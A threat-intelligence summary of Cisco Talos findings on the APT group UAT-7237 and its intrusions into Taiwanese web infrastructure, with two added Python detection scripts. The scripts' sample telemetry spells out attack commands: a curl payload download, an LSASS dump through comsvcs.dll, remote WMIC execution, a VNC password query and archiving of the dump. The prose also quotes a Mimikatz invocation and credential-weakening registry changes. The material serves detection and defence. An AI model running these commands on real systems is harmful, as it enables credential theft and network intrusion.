2025-08-28

UAT-7237 Targets Taiwan with Webshells, VPN Abuse, and Credential Theft

Level: Tactical | Source: Cisco Talos
Technology

Cisco Talos reports that a Chinese-speaking APT group it tracks as UAT-7237 has been running campaigns against web infrastructure entities in Taiwan with the aim of securing long-term access. The group has been active since at least 2022, and overlaps in tooling and tradecraft place it under a larger umbrella of threat actors. According to Cisco Talos, “UAT-7237 is likely a subgroup of UAT-5918, operating under the same umbrella of threat actors,” though its tactics and tooling preferences set it apart. Where UAT-5918 favors Meterpreter and heavy webshell usage, UAT-7237 centers on Cobalt Strike, deploys webshells sparingly, and prefers RDP for persistent access, with a SoftEther VPN client on the victim providing the route in. Talos observed that the group relies mostly on open-source utilities alongside a custom shellcode loader it calls “SoundBill,” which decodes and runs shellcode payloads, including credential theft modules and remote access implants. Talos further noted that “the threat actor had a particular interest in gaining access to the victim organization’s VPN and cloud infrastructure,” underscoring the intent to establish long-term persistence in critical environments.

The group gains initial access by scanning for vulnerable public-facing servers and exploiting exposed services, then quickly sizes up the victim with native Windows commands such as "nslookup," "systeminfo," "ping," "curl," and "ipconfig," each launched through "cmd /c." To set up a persistent route in, the operators download RAR archives containing the SoftEther VPN client into the "Temp" directory via CMD or PowerShell. Reconnaissance and lateral movement rely on tools such as FScan and SMB scanners, on mapping administrative shares such as "C$," and on identifying domain admins and domain controllers. With admin credentials in hand, they execute commands on remote hosts through WMIC, for example "whoami" checks and "netstat -ano >c:\1.txt" to capture the remote host's network connections to a file.
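The triage chain above lends itself to straightforward detection logic. The following Python is an added example, not code from the Anvilogic summary or from Talos. It runs a few rules over constructed Sysmon-style process-creation records: a burst of distinct recon binaries launched through cmd /c on one host, a RAR archive written to Temp, the SoftEther client executing from Temp, a WMIC remote process creation as seen on the sending host, the cmd.exe that WmiPrvSE.exe spawns on the receiving host, and netstat output redirected to a file. The record field names, the five-minute window and three-command threshold, the binary names vpnclient.exe and vpncmd.exe for the SoftEther client, and every sample event (hostnames, the 203.0.113.10 download address, the account name) are assumptions made up for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Built-in commands UAT-7237 runs through "cmd /c" to size up a freshly compromised host.
RECON_COMMANDS = {"nslookup", "systeminfo", "ping", "curl", "ipconfig", "whoami"}
BURST_WINDOW = timedelta(minutes=5)   # tuning assumption for this example
BURST_THRESHOLD = 3                   # distinct recon commands needed inside the window

SOFTETHER_BINARIES = {"vpnclient.exe", "vpncmd.exe"}   # assumed SoftEther client names
WMIC_REMOTE = re.compile(r"/node:\S+.*\bprocess\s+call\s+create\b", re.I)
NETSTAT_TO_FILE = re.compile(r"netstat\s+-\w+\s*>\s*\S+", re.I)
RAR_IN_TEMP = re.compile(r"\\temp\\[^\s\"]+\.rar", re.I)

# Constructed records in the shape of Sysmon Event ID 1; none of this is real telemetry.
SAMPLE_EVENTS = [
    {"ts": "2025-08-01T02:10:03", "host": "WEB01", "parent": r"C:\Windows\System32\cmd.exe",
     "parent_cmdline": "cmd /c nslookup corp.example.tw",
     "image": r"C:\Windows\System32\nslookup.exe", "cmdline": "nslookup corp.example.tw"},
    {"ts": "2025-08-01T02:10:09", "host": "WEB01", "parent": r"C:\Windows\System32\cmd.exe",
     "parent_cmdline": "cmd /c systeminfo",
     "image": r"C:\Windows\System32\systeminfo.exe", "cmdline": "systeminfo"},
    {"ts": "2025-08-01T02:10:21", "host": "WEB01", "parent": r"C:\Windows\System32\cmd.exe",
     "parent_cmdline": "cmd /c ipconfig /all",
     "image": r"C:\Windows\System32\ipconfig.exe", "cmdline": "ipconfig /all"},
    {"ts": "2025-08-01T02:11:02", "host": "WEB01", "parent": r"C:\Windows\System32\cmd.exe",
     "parent_cmdline": r"cmd /c curl http://203.0.113.10/se.rar -o C:\Windows\Temp\se.rar",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl http://203.0.113.10/se.rar -o C:\Windows\Temp\se.rar"},
    {"ts": "2025-08-01T02:14:40", "host": "WEB01", "parent": r"C:\Windows\System32\cmd.exe",
     "parent_cmdline": r"cmd /c C:\Windows\Temp\se\vpnclient.exe",
     "image": r"C:\Windows\Temp\se\vpnclient.exe", "cmdline": r"C:\Windows\Temp\se\vpnclient.exe"},
    {"ts": "2025-08-01T02:29:55", "host": "WEB01", "parent": r"C:\Windows\System32\cmd.exe",
     "parent_cmdline": "cmd", "image": r"C:\Windows\System32\wbem\wmic.exe",
     "cmdline": r'wmic /node:FS02 /user:CORP\svc_backup /password:REDACTED process call create "cmd /c netstat -ano >c:\1.txt"'},
    {"ts": "2025-08-01T02:30:11", "host": "FS02", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "parent_cmdline": r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": r"cmd /c netstat -ano >c:\1.txt"},
    {"ts": "2025-08-01T09:00:00", "host": "FS02", "parent": r"C:\Windows\System32\cmd.exe",
     "parent_cmdline": "cmd /c ping -n 1 fileserver",   # lone logon-script ping: no burst
     "image": r"C:\Windows\System32\PING.EXE", "cmdline": "ping -n 1 fileserver"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def recon_bursts(events):
    """Map host -> sorted distinct recon commands, for hosts where at least
    BURST_THRESHOLD distinct recon commands ran via cmd /c within BURST_WINDOW."""
    per_host = defaultdict(list)
    for e in events:
        name = basename(e["image"]).removesuffix(".exe")
        if (basename(e["parent"]) == "cmd.exe" and "/c" in e["parent_cmdline"].lower()
                and name in RECON_COMMANDS):
            per_host[e["host"]].append((datetime.fromisoformat(e["ts"]), name))
    bursts = {}
    for host, runs in per_host.items():
        runs.sort()
        for i, (start, _) in enumerate(runs):      # slide a window from each run
            seen = {n for t, n in runs[i:] if t - start <= BURST_WINDOW}
            if len(seen) >= BURST_THRESHOLD:
                bursts[host] = sorted(seen)
                break
    return bursts


def flag_event(e):
    """Return the names of the single-record rules that one event matches."""
    hits = []
    img, cl = basename(e["image"]), e["cmdline"]
    if img == "wmic.exe" and WMIC_REMOTE.search(cl):
        hits.append("wmic_remote_process_create")        # seen on the operator's foothold
    if basename(e["parent"]) == "wmiprvse.exe":
        hits.append("wmi_spawned_process")               # seen on the remote target
    if NETSTAT_TO_FILE.search(cl) or NETSTAT_TO_FILE.search(e["parent_cmdline"]):
        hits.append("netstat_output_to_file")            # redirection lives in the cmd line
    if RAR_IN_TEMP.search(cl):
        hits.append("rar_written_to_temp")
    if img in SOFTETHER_BINARIES and "\\temp\\" in e["image"].lower():
        hits.append("softether_client_from_temp")
    return hits


def triage(events):
    """Combine the burst detection and the per-event rules into one report."""
    return {"recon_bursts": recon_bursts(events),
            "flags": [(e["host"], e["ts"], r) for e in events for r in flag_event(e)]}


if __name__ == "__main__":
    report = triage(SAMPLE_EVENTS)
    for host, ts, rule in report["flags"]:
        print(host, ts, rule)
    print(report["recon_bursts"])
```

Note that the redirected netstat shows up twice, on the foothold in the wmic.exe command line and on the target as a cmd.exe child of WmiPrvSE.exe; correlating the two by hostname and time is what turns a noisy single-host rule into a lateral-movement finding. To run this on real data, map Sysmon's Image, CommandLine, ParentImage and ParentCommandLine fields onto the record keys used here.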

For privilege escalation and deeper system access, UAT-7237 deploys the SoundBill loader, whose payloads include Mimikatz invoked with "privilege::debug sekurlsa::logonpasswords" to pull logon credentials from LSASS memory. SoundBill can also execute arbitrary commands and, in some intrusions, deliver Cobalt Strike payloads. The group uses JuicyPotato, which abuses SeImpersonatePrivilege to elevate to SYSTEM, and tampers with the registry: setting "LocalAccountTokenFilterPolicy" to 1 lifts UAC's remote restrictions so that local administrator accounts receive a full administrative token over the network, and enabling WDigest's "UseLogonCredential" makes LSASS keep logon credentials in plaintext. Additional evasive measures include the use of “.msc” management console files to adjust permissions, blending malicious actions into routine administrative workflows.

Credential theft and persistence remain central to UAT-7237’s operations. Beyond SoundBill’s embedded credential extraction, the operators dump LSASS with the MiniDump export of "comsvcs.dll" (invoked through rundll32), run custom builds of Mimikatz, and use open-source tools such as "ssp_dump_lsass" to extract authentication data. They also hunt for stored VNC passwords in registry paths such as "HKCU\Software\ORL\WinVNC3\Password" and in .ini files across the disk. Collected data is compressed with utilities like "7z.exe," staging the dumps into archives before they are moved off the host. Lateral movement relies on FScan subnet sweeps and SMB service scans to find the next hop, while previously stolen credentials are used to connect to and enumerate victim systems and to clean up afterwards. Cisco Talos assessed that UAT-7237 has used SoftEther VPN infrastructure since at least 2022, and that the client’s language configuration is set to Simplified Chinese, further tying the operators to the Chinese-speaking threat actor ecosystem.
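Serving both the registry tampering described two paragraphs up and the LSASS dumping described here, the following Python is an added example, not code from the Anvilogic summary or from Talos. It classifies constructed Sysmon registry (Event ID 13) and process-creation (Event ID 1) records for LocalAccountTokenFilterPolicy set to 1, WDigest UseLogonCredential set to 1, rundll32 calling the MiniDump export of comsvcs.dll, reg.exe querying the WinVNC3 password key, and 7z archiving a .dmp file, and then correlates, per host, WDigest being enabled before the LSASS dump, since that ordering is what makes the dump yield plaintext passwords. The record field names, hostnames, the PID 712, the file paths and the archive password in the sample events are assumptions; the registry value names and the Sysmon "DWORD (0x...)" Details format are real.

```python
import re
from collections import defaultdict
from datetime import datetime

COMSVCS_MINIDUMP = re.compile(r"comsvcs(\.dll)?\s*,?\s*(#24|minidump)", re.I)  # name or ordinal
VNC_PASSWORD_KEY = re.compile(r"\\orl\\winvnc3", re.I)
# Case-folded suffixes of the registry values this actor flips.
UAC_FILTER_POLICY = r"\policies\system\localaccounttokenfilterpolicy"
WDIGEST_PLAINTEXT = r"\securityproviders\wdigest\uselogoncredential"

# Constructed telemetry: Sysmon Event ID 13 ("registry") and Event ID 1 ("process") records
# from two hosts. Hostnames, PID 712, paths and the archive password are made up.
SAMPLE_EVENTS = [
    {"ts": "2025-08-02T03:01:10", "host": "DB01", "type": "registry",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy",
     "details": "DWORD (0x00000001)"},
    {"ts": "2025-08-02T03:01:15", "host": "DB01", "type": "registry",
     "target": r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
     "details": "DWORD (0x00000001)"},
    {"ts": "2025-08-02T03:05:44", "host": "DB01", "type": "process",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 712 C:\Windows\Temp\ls.dmp full"},
    {"ts": "2025-08-02T03:06:30", "host": "DB01", "type": "process",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg query HKCU\Software\ORL\WinVNC3 /v Password"},
    {"ts": "2025-08-02T03:07:02", "host": "DB01", "type": "process",
     "image": r"C:\Users\Public\7z.exe",
     "cmdline": r"7z.exe a -pREDACTED C:\Windows\Temp\1.7z C:\Windows\Temp\ls.dmp"},
    {"ts": "2025-08-02T08:00:00", "host": "WKS07", "type": "registry",   # hardening to 0: benign
     "target": r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
     "details": "DWORD (0x00000000)"},
    {"ts": "2025-08-02T08:00:05", "host": "WKS07", "type": "process",    # ordinary rundll32 use
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
]


def dword(details):
    """Integer value of a Sysmon 'DWORD (0x...)' Details field, or None if it is not a DWORD."""
    m = re.search(r"DWORD \((0x[0-9a-f]+)\)", details, re.I)
    return int(m.group(1), 16) if m else None


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(e):
    """Return the rule names one record matches."""
    hits = []
    if e["type"] == "registry":
        key = e["target"].lower()
        if key.endswith(UAC_FILTER_POLICY) and dword(e["details"]) == 1:
            hits.append("uac_remote_restrictions_disabled")   # local admins get a full token remotely
        if key.endswith(WDIGEST_PLAINTEXT) and dword(e["details"]) == 1:
            hits.append("wdigest_plaintext_enabled")          # LSASS now caches cleartext passwords
        return hits
    img, cl = basename(e["image"]), e["cmdline"]
    if img == "rundll32.exe" and COMSVCS_MINIDUMP.search(cl):
        hits.append("lsass_dump_comsvcs")
    if img == "reg.exe" and VNC_PASSWORD_KEY.search(cl):
        hits.append("vnc_password_lookup")
    if img in {"7z.exe", "7za.exe"} and re.search(r"\s+a\s+", cl) and ".dmp" in cl.lower():
        hits.append("dump_archived_with_7z")                  # staging the dump for exfiltration
    return hits


def alerts(events):
    return [(e["host"], e["ts"], r) for e in events for r in classify(e)]


def credential_harvest_chains(events):
    """Hosts where WDigest plaintext caching was enabled before LSASS was dumped."""
    first_seen = defaultdict(dict)
    for e in sorted(events, key=lambda e: e["ts"]):
        for rule in classify(e):
            first_seen[e["host"]].setdefault(rule, datetime.fromisoformat(e["ts"]))
    return sorted(host for host, seen in first_seen.items()
                  if "wdigest_plaintext_enabled" in seen and "lsass_dump_comsvcs" in seen
                  and seen["wdigest_plaintext_enabled"] < seen["lsass_dump_comsvcs"])


if __name__ == "__main__":
    for host, ts, rule in alerts(SAMPLE_EVENTS):
        print(host, ts, rule)
    print("credential harvest chains:", credential_harvest_chains(SAMPLE_EVENTS))
```

The per-event rules fire on their own, but the chain function is the higher-confidence signal: a WDigest change followed minutes later by a comsvcs MiniDump on the same host has no routine administrative explanation. A WDigest value set to 0, as on the WKS07 record, is hardening rather than tampering and is deliberately left alone.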
